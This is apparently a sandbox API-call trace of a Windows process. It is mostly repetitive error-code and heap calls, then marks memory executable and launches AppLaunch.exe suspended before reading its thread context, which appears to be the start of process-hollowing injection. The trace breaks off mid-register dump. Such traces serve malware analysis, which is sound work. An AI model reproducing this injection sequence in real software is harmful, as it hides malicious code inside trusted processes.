[0309.699] SetLastError (dwErrCode=0x6) [0309.699] GetLastError () returned 0x6 [0309.699] SetLastError (dwErrCode=0x6) [0309.699] GetLastError () returned 0x6 [0309.700] SetLastError (dwErrCode=0x6) [0309.700] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.700] GetLastError () returned 0x6 [0309.700] GetLastError () returned 0x6 [0309.700] SetLastError (dwErrCode=0x6) [0309.700] GetLastError () returned 0x6 [0309.700] SetLastError (dwErrCode=0x6) [0309.700] GetLastError () returned 0x6 [0309.700] SetLastError (dwErrCode=0x6) [0309.700] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.700] GetLastError () returned 0x6 [0309.700] GetLastError () returned 0x6 [0309.700] SetLastError (dwErrCode=0x6) [0309.700] GetLastError () returned 0x6 [0309.700] SetLastError (dwErrCode=0x6) [0309.700] GetLastError () returned 0x6 [0309.700] SetLastError (dwErrCode=0x6) [0309.700] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.701] GetLastError () returned 0x6 [0309.701] GetLastError () returned 0x6 [0309.701] SetLastError (dwErrCode=0x6) [0309.701] GetLastError () returned 0x6 [0309.701] SetLastError (dwErrCode=0x6) [0309.701] GetLastError () returned 0x6 [0309.701] SetLastError (dwErrCode=0x6) [0309.701] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.701] GetLastError () returned 0x6 [0309.701] GetLastError () returned 0x6 [0309.701] SetLastError (dwErrCode=0x6) [0309.701] GetLastError () returned 0x6 [0309.701] SetLastError (dwErrCode=0x6) [0309.701] GetLastError () returned 0x6 [0309.701] SetLastError (dwErrCode=0x6) [0309.701] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.701] GetLastError () returned 0x6 [0309.701] GetLastError () returned 0x6 [0309.701] SetLastError (dwErrCode=0x6) [0309.701] GetLastError () returned 0x6 [0309.701] SetLastError (dwErrCode=0x6) [0309.702] GetLastError () returned 0x6 [0309.702] SetLastError (dwErrCode=0x6) [0309.702] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.702] GetLastError () returned 0x6 [0309.702] GetLastError () returned 0x6 [0309.702] SetLastError (dwErrCode=0x6) [0309.702] GetLastError () returned 0x6 [0309.702] SetLastError (dwErrCode=0x6) [0309.702] GetLastError () returned 0x6 [0309.702] SetLastError (dwErrCode=0x6) [0309.702] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.702] GetLastError () returned 0x6 [0309.702] GetLastError () returned 0x6 [0309.702] SetLastError (dwErrCode=0x6) [0309.702] GetLastError () returned 0x6 [0309.702] SetLastError (dwErrCode=0x6) [0309.702] GetLastError () returned 0x6 [0309.702] SetLastError (dwErrCode=0x6) [0309.703] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.703] GetLastError () returned 0x6 [0309.703] GetLastError () returned 0x6 [0309.703] SetLastError (dwErrCode=0x6) [0309.703] GetLastError () returned 0x6 [0309.703] SetLastError (dwErrCode=0x6) [0309.703] GetLastError () returned 0x6 [0309.703] SetLastError (dwErrCode=0x6) [0309.703] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.703] GetLastError () returned 0x6 [0309.703] GetLastError () returned 0x6 [0309.703] SetLastError (dwErrCode=0x6) [0309.703] GetLastError () returned 0x6 [0309.703] SetLastError (dwErrCode=0x6) [0309.703] GetLastError () returned 0x6 [0309.703] SetLastError (dwErrCode=0x6) [0309.703] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.703] GetLastError () returned 0x6 [0309.703] GetLastError () returned 0x6 [0309.703] SetLastError (dwErrCode=0x6) [0309.703] GetLastError () returned 0x6 [0309.704] SetLastError (dwErrCode=0x6) [0309.704] GetLastError () returned 0x6 [0309.704] SetLastError (dwErrCode=0x6) [0309.704] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.704] GetLastError () returned 0x6 [0309.704] GetLastError () returned 0x6 [0309.704] SetLastError (dwErrCode=0x6) [0309.704] GetLastError () returned 0x6 [0309.704] SetLastError (dwErrCode=0x6) [0309.704] GetLastError () returned 0x6 [0309.704] SetLastError (dwErrCode=0x6) [0309.704] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.704] GetLastError () returned 0x6 [0309.704] GetLastError () returned 0x6 [0309.704] SetLastError (dwErrCode=0x6) [0309.704] GetLastError () returned 0x6 [0309.704] SetLastError (dwErrCode=0x6) [0309.704] GetLastError () returned 0x6 [0309.705] SetLastError (dwErrCode=0x6) [0309.705] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.705] GetLastError () returned 0x6 [0309.705] GetLastError () returned 0x6 [0309.705] SetLastError (dwErrCode=0x6) [0309.705] GetLastError () returned 0x6 [0309.705] SetLastError (dwErrCode=0x6) [0309.705] GetLastError () returned 0x6 [0309.705] SetLastError (dwErrCode=0x6) [0309.705] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.705] GetLastError () returned 0x6 [0309.705] GetLastError () returned 0x6 [0309.705] SetLastError (dwErrCode=0x6) [0309.705] GetLastError () returned 0x6 [0309.705] SetLastError (dwErrCode=0x6) [0309.705] GetLastError () returned 0x6 [0309.705] SetLastError (dwErrCode=0x6) [0309.705] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.705] GetLastError () returned 0x6 [0309.705] GetLastError () returned 0x6 [0309.705] SetLastError (dwErrCode=0x6) [0309.706] GetLastError () returned 0x6 [0309.706] SetLastError (dwErrCode=0x6) [0309.706] GetLastError () returned 0x6 [0309.706] SetLastError (dwErrCode=0x6) [0309.706] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.706] GetLastError () returned 0x6 [0309.706] GetLastError () returned 0x6 [0309.706] SetLastError (dwErrCode=0x6) [0309.706] GetLastError () returned 0x6 [0309.706] SetLastError (dwErrCode=0x6) [0309.706] GetLastError () returned 0x6 [0309.706] SetLastError (dwErrCode=0x6) [0309.706] WriteFile (in: hFile=0x3c, lpBuffer=0x17fc9c, nNumberOfBytesToWrite=0x5a, lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fc98, lpOverlapped=0x0) returned 0 [0309.706] GetLastError () returned 0x6 [0309.706] GetLastError () returned 0x6 [0309.706] SetLastError (dwErrCode=0x6) [0309.706] GetLastError () returned 0x6 [0309.706] SetLastError (dwErrCode=0x6) [0309.725] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x8) returned 0x5aa530 [0309.743] GetLastError () returned 0x6 [0309.743] SetLastError (dwErrCode=0x6) [0309.760] GetLastError () returned 0x6 [0309.760] SetLastError (dwErrCode=0x6) [0309.808] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb8) returned 0x5b4e98 [0309.808] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6a6) returned 0x5b4f58 [0309.829] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4f58 | out: hHeap=0x5a0000) returned 1 [0309.829] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a2958 | out: hHeap=0x5a0000) returned 1 [0309.830] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2df8 | out: hHeap=0x5a0000) returned 1 [0309.830] GetLastError () returned 0x6 [0309.830] SetLastError (dwErrCode=0x6) [0309.851] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6) returned 0x5a2958 [0309.851] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x2) returned 0x5a9fd0 [0309.851] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4) returned 0x5a79f0 [0309.851] GetLastError () returned 0x6 [0309.851] SetLastError (dwErrCode=0x6) [0309.851] GetLastError () returned 0x6 [0309.851] SetLastError (dwErrCode=0x6) [0309.851] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb8) returned 0x5b2df8 [0309.851] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6a6) returned 0x5b4f58 [0309.852] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4f58 | out: hHeap=0x5a0000) returned 1 [0309.852] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a2958 | out: hHeap=0x5a0000) returned 1 [0309.852] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4e98 | out: hHeap=0x5a0000) returned 1 [0309.852] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a79f0 | out: hHeap=0x5a0000) returned 1 [0309.852] GetLastError () returned 0x6 [0309.852] SetLastError (dwErrCode=0x6) [0309.852] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6) returned 0x5a2958 [0309.852] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x2) returned 0x5a79f0 [0309.852] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4) returned 0x5b5080 [0309.852] GetLastError () returned 0x6 [0309.853] SetLastError (dwErrCode=0x6) [0309.853] GetLastError () returned 0x6 [0309.853] SetLastError (dwErrCode=0x6) [0309.853] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb8) returned 0x5b2eb8 [0309.853] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6a6) returned 0x5b50a0 [0309.853] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b50a0 | out: hHeap=0x5a0000) returned 1 [0309.853] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a2958 | out: hHeap=0x5a0000) returned 1 [0309.853] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2df8 | out: hHeap=0x5a0000) returned 1 [0309.854] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b5080 | out: hHeap=0x5a0000) returned 1 [0309.854] GetLastError () returned 0x6 [0309.854] SetLastError (dwErrCode=0x6) [0309.854] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6) returned 0x5b4f30 [0309.854] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a79f0 | out: hHeap=0x5a0000) returned 1 [0309.854] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5a9fd0 | out: hHeap=0x5a0000) returned 1 [0309.872] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x8) returned 0x5b4ff0 [0309.910] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x18) returned 0x5b3320 [0309.910] GetLastError () returned 0x6 [0309.910] SetLastError (dwErrCode=0x6) [0309.910] GetLastError () returned 0x6 [0309.911] SetLastError (dwErrCode=0x6) [0309.911] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb8) returned 0x5b2df8 [0309.911] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6a6) returned 0x5b50a0 [0309.911] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b50a0 | out: hHeap=0x5a0000) returned 1 [0309.911] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4f30 | out: hHeap=0x5a0000) returned 1 [0309.912] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2eb8 | out: hHeap=0x5a0000) returned 1 [0309.912] GetLastError () returned 0x6 [0309.912] SetLastError (dwErrCode=0x6) [0309.912] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6) returned 0x5b4ee0 [0309.913] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x2) returned 0x5b4f90 [0309.913] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4) returned 0x5b4fd0 [0309.913] GetLastError () returned 0x6 [0309.913] SetLastError (dwErrCode=0x6) [0309.913] GetLastError () returned 0x6 [0309.913] SetLastError (dwErrCode=0x6) [0309.913] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb8) returned 0x5b2eb8 [0309.913] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6a6) returned 0x5b50a0 [0309.914] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b50a0 | out: hHeap=0x5a0000) returned 1 [0309.914] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4ee0 | out: hHeap=0x5a0000) returned 1 [0309.914] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2df8 | out: hHeap=0x5a0000) returned 1 [0309.914] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4fd0 | out: hHeap=0x5a0000) returned 1 [0309.914] GetLastError () returned 0x6 [0309.914] SetLastError (dwErrCode=0x6) [0309.914] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6) returned 0x5b4fa0 [0309.915] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x2) returned 0x5b4fb0 [0309.915] GetLastError () returned 0x6 [0309.915] SetLastError (dwErrCode=0x6) [0309.915] GetLastError () returned 0x6 [0309.915] SetLastError (dwErrCode=0x6) [0309.915] GetLastError () returned 0x6 [0309.915] SetLastError (dwErrCode=0x6) [0309.915] GetLastError () returned 0x6 [0309.915] SetLastError (dwErrCode=0x6) [0309.915] GetLastError () returned 0x6 [0309.915] SetLastError (dwErrCode=0x6) [0309.915] GetLastError () returned 0x6 [0309.915] SetLastError (dwErrCode=0x6) [0309.915] GetLastError () returned 0x6 [0309.946] SetLastError (dwErrCode=0x6) [0309.946] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x1) returned 0x5b4f20 [0309.946] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x6) returned 0x5b5020 [0309.946] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x5) returned 0x5b4fe0 [0309.946] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0x4) returned 0x5b5030 [0309.947] GetLastError () returned 0x6 [0309.947] SetLastError (dwErrCode=0x6) [0309.947] GetLastError () returned 0x6 [0309.947] SetLastError (dwErrCode=0x6) [0309.947] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x8, Size=0xb8) returned 0x5b2df8 [0309.947] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6a6) returned 0x5b50a0 [0309.947] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b50a0 | out: hHeap=0x5a0000) returned 1 [0309.948] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4fa0 | out: hHeap=0x5a0000) returned 1 [0309.948] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b2eb8 | out: hHeap=0x5a0000) returned 1 [0309.948] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b5030 | out: hHeap=0x5a0000) returned 1 [0309.948] GetLastError () returned 0x6 [0309.948] SetLastError (dwErrCode=0x6) [0309.948] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x6) returned 0x5b4f30 [0309.948] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4fb0 | out: hHeap=0x5a0000) returned 1 [0309.948] HeapFree (in: hHeap=0x5a0000, dwFlags=0x0, lpMem=0x5b4f90 | out: hHeap=0x5a0000) returned 1 [0309.948] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x8) returned 0x5b4ee0 [0309.948] GetLastError () returned 0x6 [0309.948] SetLastError (dwErrCode=0x6) [0309.949] WriteFile (in: hFile=0x3c, lpBuffer=0x17fedc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x17fed8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fed8, lpOverlapped=0x0) returned 0 [0309.949] GetLastError () returned 0x6 [0309.949] GetLastError () returned 0x6 [0309.949] SetLastError (dwErrCode=0x6) [0309.949] GetLastError () returned 0x6 [0309.949] SetLastError (dwErrCode=0x6) [0309.949] GetLastError () returned 0x6 [0309.949] SetLastError (dwErrCode=0x6) [0309.949] WriteFile (in: hFile=0x3c, lpBuffer=0x17fedc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x17fed8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fed8, lpOverlapped=0x0) returned 0 [0309.949] GetLastError () returned 0x6 [0309.949] GetLastError () returned 0x6 [0309.949] SetLastError (dwErrCode=0x6) [0309.949] GetLastError () returned 0x6 [0309.949] SetLastError (dwErrCode=0x6) [0309.950] GetLastError () returned 0x6 [0309.950] SetLastError (dwErrCode=0x6) [0309.950] WriteFile (in: hFile=0x3c, lpBuffer=0x17fedc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x17fed8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fed8, lpOverlapped=0x0) returned 0 [0309.950] GetLastError () returned 0x6 [0309.950] GetLastError () returned 0x6 [0309.950] SetLastError (dwErrCode=0x6) [0309.950] GetLastError () returned 0x6 [0309.950] SetLastError (dwErrCode=0x6) [0309.952] GetLastError () returned 0x6 [0309.952] SetLastError (dwErrCode=0x6) [0309.952] WriteFile (in: hFile=0x3c, lpBuffer=0x17fedc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x17fed8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fed8, lpOverlapped=0x0) returned 0 [0309.952] GetLastError () returned 0x6 [0309.952] GetLastError () returned 0x6 [0309.952] SetLastError (dwErrCode=0x6) [0309.953] GetLastError () returned 0x6 [0309.953] SetLastError (dwErrCode=0x6) [0309.953] GetLastError () returned 0x6 [0309.953] SetLastError (dwErrCode=0x6) [0309.953] WriteFile (in: hFile=0x3c, lpBuffer=0x17fedc, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x17fed8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x17fed8, lpOverlapped=0x0) returned 0 [0309.953] GetLastError () returned 0x6 [0309.953] GetLastError () returned 0x6 [0309.953] SetLastError (dwErrCode=0x6) [0309.953] GetLastError () returned 0x6 [0309.953] SetLastError (dwErrCode=0x6) [0309.971] GetLastError () returned 0x6 [0309.991] GetProcAddress (hModule=0x77420000, lpProcName="FlsGetValue") returned 0x774cf350 [0309.992] SetLastError (dwErrCode=0x6) [0310.011] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x74580000 [0310.012] GetProcAddress (hModule=0x74580000, lpProcName="VirtualProtect") returned 0x74597a50 [0310.012] VirtualProtect (in: lpAddress=0x182754, dwSize=0x77e, flNewProtect=0x40, lpflOldProtect=0x1816dc | out: lpflOldProtect=0x1816dc*=0x4) returned 1 [0310.170] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5b2328, cbMultiByte=60, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0310.170] RtlAllocateHeap (HeapHandle=0x5a0000, Flags=0x0, Size=0x80) returned 0x5b2eb8 [0310.170] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x5b2328, cbMultiByte=60, lpWideCharStr=0x5b2eb8, cchWideChar=60 | out: lpWideCharStr="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe") returned 60 [0310.172] CreateProcessW (in: lpApplicationName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\AppLaunch.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x181828*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x181964 | out: lpCommandLine=0x0, lpProcessInformation=0x181964*(hProcess=0x30, hThread=0x38, dwProcessId=0x3b8, dwThreadId=0x594)) returned 1 [0310.491] GetThreadContext (in: hThread=0x38, lpContext=0x18155c | out: lpContext=0x18155c*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x4f2000, Edx=0x0, Ecx=0x0, Eax=0x35eb7c, Ebp=0x0, Eip=0x778a8fe0, SegCs=0x23, EFlags=0x202, Esp=0x19fff0, SegSs=0x2b, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, 